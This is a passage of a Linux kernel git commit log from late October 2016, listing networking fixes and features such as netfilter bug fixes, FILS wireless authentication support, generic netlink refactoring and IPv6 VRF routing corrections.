Reviewed-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Chuck Lever <chuck.lever@oracle.com>
Reported-by: Eryu Guan <guaneryu@gmail.com>
Tested-by: Eryu Guan <guaneryu@gmail.com>
Fixes: 68778945e4 "SUNRPC: Separate buffer pointers..."
Reported-by: J. Bruce Fields <bfields@fieldses.org>
Signed-off-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-10-28 16:57:33 -04:00
Colin Ian King
b09edbd07f net caif: insert missing spaces in pr_* messages and unbreak multi-line strings
Some of the pr_* messages are missing spaces, so insert these and also
unbreak multi-line literal strings in pr_* messages

Signed-off-by: Colin Ian King <colin.king@canonical.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-28 13:47:33 -04:00
David S. Miller
1d00578836 Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next
Steffen Klassert says:

====================
pull request (net-next): ipsec-next 2016-10-25

Just a leftover from the last development cycle.

1) Remove some unused code, from Florian Westphal.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-28 13:26:27 -04:00
Arnd Bergmann
5747620257 netfilter: ip_vs_sync: fix bogus maybe-uninitialized warning
Building the ip_vs_sync code with CONFIG_OPTIMIZE_INLINING on x86
confuses the compiler to the point where it produces a rather
dubious warning message:

net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
  struct ip_vs_sync_conn_options opt;
                                 ^~~
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]

The problem appears to be a combination of a number of factors, including
the __builtin_bswap32 compiler builtin being slightly odd, having a large
amount of code inlined into a single function, and the way that some
functions only get partially inlined here.

I've spent way too much time trying to work out a way to improve the
code, but the best I've come up with is to add an explicit memset
right before the ip_vs_seq structure is first initialized here. When
the compiler works correctly, this has absolutely no effect, but in the
case that produces the warning, the warning disappears.

In the process of analysing this warning, I also noticed that
we use memcpy to copy the larger ip_vs_sync_conn_options structure
over two members of the ip_vs_conn structure. This works because
the layout is identical, but seems error-prone, so I'm changing
this in the process to directly copy the two members. This change
seemed to have no effect on the object code or the warning, but
it deals with the same data, so I kept the two changes together.

Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-28 14:14:51 +02:00
Arnd Bergmann
514877182b mac80211: fils_aead: fix encrypt error handling
gcc -Wmaybe-uninitialized reports a bug in aes_siv_encryp:

net/mac80211/fils_aead.c: In function ‘aes_siv_encrypt.constprop’:
net/mac80211/fils_aead.c:84:26: error: ‘tfm2’ may be used uninitialized in this function [-Werror=maybe-uninitialized]

At the time that the memory allocation fails, 'tfm2' has not been
allocated, so we should not attempt to free it later, and we can
simply return an error.

Fixes: 39404feee6 ("mac80211: FILS AEAD protection for station mode association frames")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-28 12:59:12 +02:00
Andrey Vagin
002d8a1a6c net: skip genenerating uevents for network namespaces that are exiting
No one can see these events, because a network namespace can not be
destroyed, if it has sockets.

Unlike other devices, uevent-s for network devices are generated
only inside their network namespaces. They are filtered in
kobj_bcast_filter()

My experiments shows that net namespaces are destroyed more 30% faster
with this optimization.

Here is a perf output for destroying network namespaces without this
patch.

-   94.76%     0.02%  kworker/u48:1  [kernel.kallsyms]     [k] cleanup_net
   - 94.74% cleanup_net
      - 94.64% ops_exit_list.isra.4
         - 41.61% default_device_exit_batch
            - 41.47% unregister_netdevice_many
               - rollback_registered_many
                  - 40.36% netdev_unregister_kobject
                     - 14.55% device_del
                        + 13.71% kobject_uevent
                     - 13.04% netdev_queue_update_kobjects
                        + 12.96% kobject_put
                     - 12.72% net_rx_queue_update_kobjects
                          kobject_put
                        - kobject_release
                           + 12.69% kobject_uevent
                  + 0.80% call_netdevice_notifiers_info
         + 19.57% nfsd_exit_net
         + 11.15% tcp_net_metrics_exit
         + 8.25% rpcsec_gss_exit_net

It's very critical to optimize the exit path for network namespaces,
because they are destroyed under net_mutex and many namespaces can be
destroyed for one iteration.

v2: use dev_set_uevent_suppress()

Cc: Cong Wang <xiyou.wangcong@gmail.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: Eric W. Biederman <ebiederm@xmission.com>
Signed-off-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 17:14:47 -04:00
Jamal Hadi Salim
9ee7837449 net sched filters: fix notification of filter delete with proper handle
Daniel says:

While trying out [1][2], I noticed that tc monitor doesn't show the
correct handle on delete:

$ tc monitor
qdisc clsact ffff: dev eno1 parent ffff:fff1
filter dev eno1 ingress protocol all pref 49152 bpf handle 0x2a [...]
deleted filter dev eno1 ingress protocol all pref 49152 bpf handle 0xf3be0c80

some context to explain the above:
The user identity of any tc filter is represented by a 32-bit
identifier encoded in tcm->tcm_handle. Example 0x2a in the bpf filter
above. A user wishing to delete, get or even modify a specific filter
uses this handle to reference it.
Every classifier is free to provide its own semantics for the 32 bit handle.
Example: classifiers like u32 use schemes like 800:1:801 to describe
the semantics of their filters represented as hash table, bucket and
node ids etc.
Classifiers also have internal per-filter representation which is different
from this externally visible identity. Most classifiers set this
internal representation to be a pointer address (which allows fast retrieval
of said filters in their implementations). This internal representation
is referenced with the "fh" variable in the kernel control code.

When a user successfuly deletes a specific filter, by specifying the correct
tcm->tcm_handle, an event is generated to user space which indicates
which specific filter was deleted.

Before this patch, the "fh" value was sent to user space as the identity.
As an example what is shown in the sample bpf filter delete event above
is 0xf3be0c80. This is infact a 32-bit truncation of 0xffff8807f3be0c80
which happens to be a 64-bit memory address of the internal filter
representation (address of the corresponding filter's struct cls_bpf_prog);

After this patch the appropriate user identifiable handle as encoded
in the originating request tcm->tcm_handle is generated in the event.
One of the cardinal rules of netlink rules is to be able to take an
event (such as a delete in this case) and reflect it back to the
kernel and successfully delete the filter. This patch achieves that.

Note, this issue has existed since the original TC action
infrastructure code patch back in 2004 as found in:
https://git.kernel.org/cgit/linux/kernel/git/history/history.git/commit/

[1] http://patchwork.ozlabs.org/patch/682828/
[2] http://patchwork.ozlabs.org/patch/682829/

Fixes: 4e54c4816bfe ("[NET]: Add tc extensions infrastructure.")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 17:12:33 -04:00
Arnd Bergmann
bc72f3dd89 flow_dissector: fix vlan tag handling
gcc warns about an uninitialized pointer dereference in the vlan
priority handling:

net/core/flow_dissector.c: In function '__skb_flow_dissect':
net/core/flow_dissector.c:281:61: error: 'vlan' may be used uninitialized in this function [-Werror=maybe-uninitialized]

As pointed out by Jiri Pirko, the variable is never actually used
without being initialized first as the only way it end up uninitialized
is with skb_vlan_tag_present(skb)==true, and that means it does not
get accessed.

However, the warning hints at some related issues that I'm addressing
here:

- the second check for the vlan tag is different from the first one
  that tests the skb for being NULL first, causing both the warning
  and a possible NULL pointer dereference that was not entirely fixed.
- The same patch that introduced the NULL pointer check dropped an
  earlier optimization that skipped the repeated check of the
  protocol type
- The local '_vlan' variable is referenced through the 'vlan' pointer
  but the variable has gone out of scope by the time that it is
  accessed, causing undefined behavior

Caching the result of the 'skb && skb_vlan_tag_present(skb)' check
in a local variable allows the compiler to further optimize the
later check. With those changes, the warning also disappears.

Fixes: 3805a938a6 ("flow_dissector: Check skb for VLAN only if skb specified.")
Fixes: d5709f7ab7 ("flow_dissector: For stripped vlan, get vlan info from skb->vlan_tci")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Jiri Pirko <jiri@mellanox.com>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:36:03 -04:00
David Ahern
d5d32e4b76 net: ipv6: Do not consider link state for nexthop validation
Similar to IPv4, do not consider link state when validating next hops.

Currently, if the link is down default routes can fail to insert:
 $ ip -6 ro add vrf blue default via 2100:2::64 dev eth2
 RTNETLINK answers: No route to host

With this patch the command succeeds.

Fixes: 8c14586fc3 ("net: ipv6: Use passed in table for nexthop lookups")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:33:12 -04:00
David Ahern
830218c1ad net: ipv6: Fix processing of RAs in presence of VRF
rt6_add_route_info and rt6_add_dflt_router were updated to pull the FIB
table from the device index, but the corresponding rt6_get_route_info
and rt6_get_dflt_router functions were not leading to the failure to
process RA's:

    ICMPv6: RA: ndisc_router_discovery failed to add default route

Fix the 'get' functions by using the table id associated with the
device when applicable.

Also, now that default routes can be added to tables other than the
default table, rt6_purge_dflt_routers needs to be updated as well to
look at all tables. To handle that efficiently, add a flag to the table
denoting if it is has a default route via RA.

Fixes: ca254490c8 ("net: Add VRF support to IPv6 stack")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:30:52 -04:00
Johannes Berg
56989f6d85 genetlink: mark families as __ro_after_init
Now genl_register_family() is the only thing (other than the
users themselves, perhaps, but I didn't find any doing that)
writing to the family struct.

In all families that I found, genl_register_family() is only
called from __init functions (some indirectly, in which case
I've add __init annotations to clarifly things), so all can
actually be marked __ro_after_init.

This protects the data structure from accidental corruption.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
2ae0f17df1 genetlink: use idr to track families
Since generic netlink family IDs are small integers, allocated
densely, IDR is an ideal match for lookups. Replace the existing
hand-written hash-table with IDR for allocation and lookup.

This lets the families only be written to once, during register,
since the list_head can be removed and removal of a family won't
cause any writes.

It also slightly reduces the code size (by about 1.3k on x86-64).

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
489111e5c2 genetlink: statically initialize families
Instead of providing macros/inline functions to initialize
the families, make all users initialize them statically and
get rid of the macros.

This reduces the kernel code size by about 1.6k on x86-64
(with allyesconfig).

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
a07ea4d994 genetlink: no longer support using static family IDs
Static family IDs have never really been used, the only
use case was the workaround I introduced for those users
that assumed their family ID was also their multicast
group ID.

Additionally, because static family IDs would never be
reserved by the generic netlink code, using a relatively
low ID would only work for built-in families that can be
registered immediately after generic netlink is started,
which is basically only the control family (apart from
the workaround code, which I also had to add code for so
it would reserve those IDs)

Thus, anything other than GENL_ID_GENERATE is flawed and
luckily not used except in the cases I mentioned. Move
those workarounds into a few lines of code, and then get
rid of GENL_ID_GENERATE entirely, making it more robust.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
c90c39dab3 genetlink: introduce and use genl_family_attrbuf()
This helper function allows family implementations to access
their family's attrbuf. This gets rid of the attrbuf usage
in families, and also adds locking validation, since it's not
valid to use the attrbuf with parallel_ops or outside of the
dumpit callback.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:08 -04:00
Antonio Quartulli
4fe77d82ef skbedit: allow the user to specify bitmask for mark
The user may want to use only some bits of the skb mark in
his skbedit rules because the remaining part might be used by
something else.

Introduce the "mask" parameter to the skbedit actor in order
to implement such functionality.

When the mask is specified, only those bits selected by the
latter are altered really changed by the actor, while the
rest is left untouched.

Signed-off-by: Antonio Quartulli <antonio@open-mesh.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:07:25 -04:00
John W. Linville
f1d505bb76 netfilter: nf_tables: fix type mismatch with error return from nft_parse_u32_check
Commit 36b701fae1 ("netfilter: nf_tables: validate maximum value of
u32 netlink attributes") introduced nft_parse_u32_check with a return
value of "unsigned int", yet on error it returns "-ERANGE".

This patch corrects the mismatch by changing the return value to "int",
which happens to match the actual users of nft_parse_u32_check already.

Found by Coverity, CID 1373930.

Note that commit 21a9e0f156 ("netfilter: nft_exthdr: fix error
handling in nft_exthdr_init()) attempted to address the issue, but
did not address the return type of nft_parse_u32_check.

Signed-off-by: John W. Linville <linville@tuxdriver.com>
Cc: Laura Garcia Liebana <nevola@gmail.com>
Cc: Pablo Neira Ayuso <pablo@netfilter.org>
Cc: Dan Carpenter <dan.carpenter@oracle.com>
Fixes: 36b701fae1 ("netfilter: nf_tables: validate maximum value...")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:29:01 +02:00
Ulrich Weber
444f901742 netfilter: nf_conntrack_sip: extend request line validation
on SIP requests, so a fragmented TCP SIP packet from an allow header starting with
 INVITE,NOTIFY,OPTIONS,REFER,REGISTER,UPDATE,SUBSCRIBE
 Content-Length: 0

will not bet interpreted as an INVITE request. Also Request-URI must start with an alphabetic character.

Confirm with RFC 3261
 Request-Line   =  Method SP Request-URI SP SIP-Version CRLF

Fixes: 30f33e6dee ("[NETFILTER]: nf_conntrack_sip: support method specific request/response handling")
Signed-off-by: Ulrich Weber <ulrich.weber@riverbed.com>
Acked-by: Marco Angaroni <marcoangaroni@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:27:59 +02:00
Liping Zhang
dab45060a5 netfilter: nf_tables: fix race when create new element in dynset
Packets may race when create the new element in nft_hash_update:
       CPU0                 CPU1
  lookup_fast - fail     lookup_fast - fail
       new - ok             new - ok
     insert - ok         insert - fail(EEXIST)

So when race happened, we reuse the existing element. Otherwise,
these *racing* packets will not be handled properly.

Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:22:02 +02:00
Liping Zhang
61f9e2924f netfilter: nf_tables: fix *leak* when expr clone fail
When nft_expr_clone failed, a series of problems will happen:

1. module refcnt will leak, we call __module_get at the beginning but
   we forget to put it back if ops->clone returns fail
2. memory will be leaked, if clone fail, we just return NULL and forget
   to free the alloced element
3. set->nelems will become incorrect when set->size is specified. If
   clone fail, we should decrease the set->nelems

Now this patch fixes these problems. And fortunately, clone fail will
only happen on counter expression when memory is exhausted.

Fixes: 086f332167 ("netfilter: nf_tables: add clone interface to expression operations")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:20:45 +02:00
Liping Zhang
bb6a6e8e09 netfilter: nft_dynset: fix panic if NFT_SET_HASH is not enabled
When CONFIG_NFT_SET_HASH is not enabled and I input the following rule:
"nft add rule filter output flow table test {ip daddr counter }", kernel
panic happened on my system:
 BUG: unable to handle kernel NULL pointer dereference at (null)
 IP: [<          (null)>]           (null)
 [...]
 Call Trace:
 [<ffffffffa0590466>] ? nft_dynset_eval+0x56/0x100 [nf_tables]
 [<ffffffffa05851bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
 [<ffffffffa0432f01>] ? nf_conntrack_tuple_taken+0x61/0x210 [nf_conntrack]
 [<ffffffffa0459ea6>] ? get_unique_tuple+0x136/0x560 [nf_nat]
 [<ffffffffa043bca1>] ? __nf_ct_ext_add_length+0x111/0x130 [nf_conntrack]
 [<ffffffffa045a357>] ? nf_nat_setup_info+0x87/0x3b0 [nf_nat]
 [<ffffffff81761e27>] ? ipt_do_table+0x327/0x610
 [<ffffffffa045a6d7>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
 [<ffffffffa059f21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
 [<ffffffff81702515>] nf_iterate+0x55/0x60
 [<ffffffff81702593>] nf_hook_slow+0x73/0xd0

Because in rbtree type set, ops->update is not implemented. So just keep
it simple, in such case, report -EOPNOTSUPP to the user space.

Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:20:08 +02:00
vamsi krishna
088e8df82f cfg80211: Add support to update connection parameters
Add functionality to update the connection parameters when in connected
state, so that driver/firmware uses the updated parameters for
subsequent roaming. This is for drivers that support internal BSS
selection and roaming. The new command does not change the current
association state, i.e., it can be used to update IE contents for future
(re)associations without causing an immediate disassociation or
reassociation with the current BSS.

This commit implements the required functionality for updating IEs for
(Re)Association Request frame only. Other parameters can be added in
future when required.

Signed-off-by: vamsi krishna <vamsin@qti.qualcomm.com>
Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:28 +02:00
Johannes Berg
8ac6344865 cfg80211: handle fragmented IEs in splitting
The IEs "output" can sometimes combine IEs coming from userspace
with IEs generated in the kernel - in particular mac80211 does
this for association frames.

Add support in this code for the 802.11 IE fragmentation.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:27 +02:00
Michael Braun
ce0ce13a1c cfg80211: configure multicast to unicast for AP interfaces
Add the ability to configure if an AP (and associated VLANs) will
do multicast-to-unicast conversion for ARP, IPv4 and IPv6 frames
(possibly within 802.1Q). If enabled, such frames are to be sent
to each station separately, with the DA replaced by their own MAC
address rather than the group address.

Note that this may break certain expectations of the receiver,
such as the ability to drop unicast IP packets received within
multicast L2 frames, or the ability to not send ICMP destination
unreachable messages for packets received in L2 multicast (which
is required, but the receiver can't tell the difference if this
new option is enabled.)

This also doesn't implement the 802.11 DMS (directed multicast
service).

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[fix disabling, add better documentation & commit message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:27 +02:00
Jouni Malinen
f3ca52aa52 mac80211: Claim Fast Initial Link Setup (FILS) STA support
With the previous commits, initial FILS authentication/association
support is now functional in mac80211-based drivers for station role
(and FILS AP case is covered by user space in hostapd withotu requiring
mac80211 changes).

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:26 +02:00
Jouni Malinen
39404feee6 mac80211: FILS AEAD protection for station mode association frames
This adds support for encrypting (Re)Association Request frame and
decryption (Re)Association Response frame when using FILS in station
mode.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:25 +02:00
Jouni Malinen
dbc0c2cb2f mac80211: Add FILS auth alg mapping
Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:25 +02:00
Jouni Malinen
348bd45669 cfg80211: Add KEK/nonces for FILS association frames
The new nl80211 attributes can be used to provide KEK and nonces to
allow the driver to encrypt and decrypt FILS (Re)Association
Request/Response frames in station mode.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:24 +02:00
Jouni Malinen
631810603a cfg80211: Add Fast Initial Link Setup (FILS) auth algs
This defines authentication algorithms for FILS (IEEE 802.11ai).

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:23 +02:00
Jouni Malinen
6ec63612c3 mac80211: Allow AUTH_DATA to be used for FILS
The special SAE case should be limited only for SAE since the more
generic AUTH_DATA can now be used with other authentication algorithms
as well.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:21 +02:00
Jouni Malinen
11b6b5a4ce cfg80211: Rename SAE_DATA to more generic AUTH_DATA
This adds defines and nl80211 extensions to allow FILS Authentication to
be implemented similarly to SAE. FILS does not need the special rules
for the Authentication transaction number and Status code fields, but it
does need to add non-IE fields. The previously used
NL80211_ATTR_SAE_DATA can be reused for this to avoid having to
duplicate that implementation. Rename that attribute to more generic
NL80211_ATTR_AUTH_DATA (with backwards compatibility define for
NL80211_SAE_DATA).

Also document the special rules related to the Authentication
transaction number and Status code fiels.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:20 +02:00
Johannes Berg
bfe2c7b1cc nl80211: use nla_parse_nested() instead of nla_parse()
It's just an inline doing the same thing, but the code
is nicer with it.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:20 +02:00
Johannes Berg
1794899e8b nl80211: move unsplit command advertising to a separate function
When we split the wiphy dump because it got too large, I added a
comment and asked that all new command advertising be done only
for userspace clients capable of receiving split data, in order
to not break older ones (which can't use the new commands anyway)

This mostly worked, and we haven't added many new commands, but
I occasionally get patches that modify the wrong place.

Make this easier to detect and understand by splitting out the
old commands to a separate function that makes it more clear it
should never be modified again.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:19 +02:00
Johannes Berg
ac668afe41 mac80211: validate new interface's beacon intervals
As part of interface combination checking, verify any new
interface's beacon intervals. In fact, just always add the
beacon interval since that's harmless.

With this patch, mac80211 is prepared for drivers that set
the min_beacon_int_gcd parameter in interface combinations.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:18:07 +02:00
Johannes Berg
4c8dea638c cfg80211: validate beacon int as part of iface combinations
Remove the pointless checking against interface combinations in
the initial basic beacon interval validation, that currently isn't
taking into account radar detection or channels properly. Instead,
just validate the basic range there, and then delay real checking
to the interface combination validation that drivers must do.

This means that drivers wanting to use the beacon_int_min_gcd will
now have to pass the new_beacon_int when validating the AP/mesh
start.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:18:07 +02:00
Johannes Berg
56271da29c cfg80211: disallow beacon_int_min_gcd with IBSS
This can't really be supported right now, because the IBSS
interface may change its beacon interval at any time due to
joining another network; thus, there's already "support"
for different beacon intervals here, implicitly.

Until we figure out how we should handle this case (continue
to allow it to arbitrarily join? Join only if compatible?)
disallow advertising that different beacon intervals are
supported if IBSS is allowed.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:45 +02:00
Johannes Berg
275fcf62c2 cfg80211: mesh: track (and thus validate) beacon interval
This is needed for beacon interval validation; if we don't
store it, then new interfaces added won't validate that the
beacon interval is the same as existing ones. Fix this.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:45 +02:00
Johannes Berg
0507a3ac6e cfg80211: fix beacon interval in interface combination iteration
We shouldn't abort the iteration with an error when one of the
potential combinations can't accomodate the beacon interval
request, we should just skip that particular combination. Fix
the code to do so.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:44 +02:00
Arend Van Spriel
73c7da3dae cfg80211: add generic helper to check interface is running
Add a helper using wdev to check if interface is running. This
deals with both non-netdev and netdev interfaces. In struct
wireless_dev replace 'p2p_started' and 'nan_started' by
'is_running' as those are mutually exclusive anyway, and unify
all the code to use wdev_running().

Signed-off-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:44 +02:00
Johannes Berg
8f20542386 wireless: deprecate WDS and disable by default
The old WDS 4-addr frame support is very limited, e.g.
 * no encryption is possible on such links
 * it cannot support rate/HT/VHT negotiation
 * management APIs are very restricted

These make the WDS legacy mode useless in practice.

All of these are resolved by the 4-addr AP/client support,
so there's also no reason to improve WDS in the future.

Therefore, add a Kconfig option to disable legacy WDS.
This gives people an "emergency valve" while they migrate
to the better-supported 4-addr AP/client option; we plan
to remove it (and the associated cfg80211/mac80211 code,
which is the ultimate goal) in the future.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:43 +02:00
Eric Dumazet
10df8e6152 udp: fix IP_CHECKSUM handling
First bug was added in commit ad6f939ab1 ("ip: Add offset parameter to
ip_cmsg_recv") : Tom missed that ipv4 udp messages could be received on
AF_INET6 socket. ip_cmsg_recv(msg, skb) should have been replaced by
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));

Then commit e6afc8ace6 ("udp: remove headers from UDP packets before
queueing") forgot to adjust the offsets now UDP headers are pulled
before skb are put in receive queue.

Fixes: ad6f939ab1 ("ip: Add offset parameter to ip_cmsg_recv")
Fixes: e6afc8ace6 ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Sam Kumar <samanthakumar@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Tested-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:33:22 -04:00
Xin Long
ecc515d723 sctp: fix the panic caused by route update
Commit 7303a14750 ("sctp: identify chunks that need to be fragmented
at IP level") made the chunk be fragmented at IP level in the next round
if it's size exceed PMTU.

But there still is another case, PMTU can be updated if transport's dst
expires and transport's pmtu_pending is set in sctp_packet_transmit. If
the new PMTU is less than the chunk, the same issue with that commit can
be triggered.

So we should drop this packet and let it retransmit in another round
where it would be fragmented at IP level.

This patch is to fix it by checking the chunk size after PMTU may be
updated and dropping this packet if it's size exceed PMTU.

Fixes: 90017accff ("sctp: Add GSO support")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@txudriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:32:19 -04:00
Elad Raz
6edf10173a devlink: Prevent port_type_set() callback when it's not needed
When a port_type_set() is been called and the new port type set is the same
as the old one, just return success.

Signed-off-by: Elad Raz <eladr@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:30:32 -04:00
Sven Eckelmann
701470baba batman-adv: Revert "use core MTU range checking in misc drivers"
The maximum MTU is defined via the slave devices of an batman-adv
interface. Thus it is not possible to calculate the max_mtu during the
creation of the batman-adv device when no slave devices are attached. Doing
so would for example break non-fragmentation setups which then
(incorrectly) allow an MTU of 1500 even when underlying device cannot
transport 1500 bytes + batman-adv headers.

Checking the dynamically calculated max_mtu via the minimum of the slave
devices MTU during .ndo_change_mtu is also used by the bridge interface.

Cc: Jarod Wilson <jarod@redhat.com>
Fixes: b3e3893e12 ("net: use core MTU range checking in misc drivers")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:19:07 -04:00
Eric Dumazet
73e42ff72a sch_htb: do not report fake rate estimators
When I prepared commit d250a5f90e ("pkt_sched: gen_estimator: Dont
report fake rate estimators"), htb still had an implicit rate estimator
for all its classes.

Then later, I made this rate estimator optional in commit 64153ce0a7
("net_sched: htb: do not setup default rate estimators"), but I forgot
to update htb use of gnet_stats_copy_rate_est()

After this patch, "tc -s qdisc ..." no longer report fake rate
estimators for HTB classes.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:13:49 -04:00
J. Bruce Fields
2876a34466 sunrpc: don't pass on-stack memory to sg_set_buf
As of ac4e97abce "scatterlist: sg_set_buf() argument must be in linear
mapping", sg_set_buf hits a BUG when make_checksum_v2->xdr_process_buf,
among other callers, passes it memory on the stack.

We only need a scatterlist to pass this to the crypto code, and it seems
like overkill to require kmalloc'd memory just to encrypt a few bytes,
but for now this seems the best fix.

Many of these callers are in the NFS write paths, so we allocate with
GFP_NOFS.  It might be possible to do without allocations here entirely,
but that would probably be a bigger project.

Cc: Rusty Russell <rusty@rustcorp.com.au>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-10-26 15:49:48 -04:00
Pablo Neira Ayuso
254432613c netfilter: nft_ct: add notrack support
This patch adds notrack support.

I decided to add a new expression, given that this doesn't fit into the
existing set operation. Notrack doesn't need a source register, and an
hypothetical NFT_CT_NOTRACK key makes no sense since matching the
untracked state is done through NFT_CT_STATE.

I'm placing this new notrack expression into nft_ct.c, I think a single
module is too much.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:16 +02:00
Liping Zhang
96d9f2a72c netfilter: nft_meta: permit pkttype mangling in ip/ip6 prerouting
After supporting this, we can combine it with hash expression to emulate
the 'cluster match'.

Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org>
